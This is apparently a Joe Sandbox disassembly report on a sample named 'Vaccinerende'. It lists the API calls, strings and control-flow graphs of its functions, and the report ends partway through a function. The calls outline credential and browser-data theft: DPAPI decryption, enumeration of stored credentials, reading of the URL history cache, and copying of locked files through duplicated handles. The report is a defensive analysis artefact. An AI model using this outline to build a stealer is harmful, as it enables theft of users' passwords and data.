                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                            • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 597 413ee4 590->597 598 413ee7-413efe 590->598 604 413ea2-413eae CloseHandle 592->604 595 413e61-413e68 593->595 596 413e37-413e44 GetModuleHandleW 593->596 595->592 601 413e6a-413e76 595->601 596->595 600 413e46-413e5c GetProcAddress 596->600 597->598 598->580 600->595 601->592 604->583
                                            APIs
                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                            • memset.MSVCRT ref: 00413D7F
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                            • memset.MSVCRT ref: 00413E07
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                            • free.MSVCRT ref: 00413EC1
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                            • API String ID: 1344430650-1740548384
                                            • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                            • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 696 40b58d-40b59e 697 40b5a4-40b5c0 GetModuleHandleW FindResourceW 696->697 698 40b62e-40b632 696->698 699 40b5c2-40b5ce LoadResource 697->699 700 40b5e7 697->700 699->700 701 40b5d0-40b5e5 SizeofResource LockResource 699->701 702 40b5e9-40b5eb 700->702 701->702 702->698 703 40b5ed-40b5ef 702->703 703->698 704 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 703->704 704->698
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                            • String ID: AE$BIN
                                            • API String ID: 1668488027-3931574542
                                            • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                            • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 767404330-0
                                            • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                            • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileFind$FirstNext
                                            • String ID:
                                            • API String ID: 1690352074-0
                                            APIs
                                            • memset.MSVCRT ref: 0041898C
                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: InfoSystemmemset
                                            • String ID:
                                            • API String ID: 3558857096-0

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 004455C2
                                            • wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 0044570D
                                            • memset.MSVCRT ref: 00445725
                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            • memset.MSVCRT ref: 0044573D
                                            • memset.MSVCRT ref: 00445755
                                            • memset.MSVCRT ref: 004458CB
                                            • memset.MSVCRT ref: 004458E3
                                            • memset.MSVCRT ref: 0044596E
                                            • memset.MSVCRT ref: 00445A10
                                            • memset.MSVCRT ref: 00445A28
                                            • memset.MSVCRT ref: 00445AC6
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            • memset.MSVCRT ref: 00445B52
                                            • memset.MSVCRT ref: 00445B6A
                                            • memset.MSVCRT ref: 00445C9B
                                            • memset.MSVCRT ref: 00445CB3
                                            • _wcsicmp.MSVCRT ref: 00445D56
                                            • memset.MSVCRT ref: 00445B82
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                            • memset.MSVCRT ref: 00445986
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                            • API String ID: 1963886904-3798722523

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                            • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                            • String ID: $/deleteregkey$/savelangfile
                                            • API String ID: 2744995895-28296030

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                            • wcsrchr.MSVCRT ref: 0040B738
                                            • memset.MSVCRT ref: 0040B756
                                            • memset.MSVCRT ref: 0040B7F5
                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                            • memset.MSVCRT ref: 0040B851
                                            • memset.MSVCRT ref: 0040B8CA
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                            • memset.MSVCRT ref: 0040BB53
                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                            • String ID: chp$v10
                                            • API String ID: 1297422669-2783969131

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 004091E2
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                            • String ID:
                                            • API String ID: 3715365532-3916222277

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                            • String ID: bhv
                                            • API String ID: 4234240956-2689659898

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                            • API String ID: 2941347001-70141382

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • wcschr.MSVCRT ref: 0040C324
                                            • wcschr.MSVCRT ref: 0040C344
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • GetLastError.KERNEL32 ref: 0040C373
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                            • String ID: visited:
                                            • API String ID: 2470578098-1702587658

                                            Control-flow Graph

                                            control_flow_graph 663 40e175-40e1a1 call 40695d call 406b90 668 40e1a7-40e1e5 memset 663->668 669 40e299-40e2a8 call 4069a3 663->669 671 40e1e8-40e1fa call 406e8f 668->671 675 40e270-40e27d call 406b53 671->675 676 40e1fc-40e219 call 40dd50 * 2 671->676 675->671 681 40e283-40e286 675->681 676->675 687 40e21b-40e21d 676->687 684 40e291-40e294 call 40aa04 681->684 685 40e288-40e290 free 681->685 684->669 685->684 687->675 688 40e21f-40e235 call 40742e 687->688 688->675 691 40e237-40e242 call 40aae3 688->691 691->675 694 40e244-40e26b _snwprintf call 40a8d0 691->694 694->675
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • free.MSVCRT ref: 0040E28B
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                            • _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                            • API String ID: 2804212203-2982631422

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
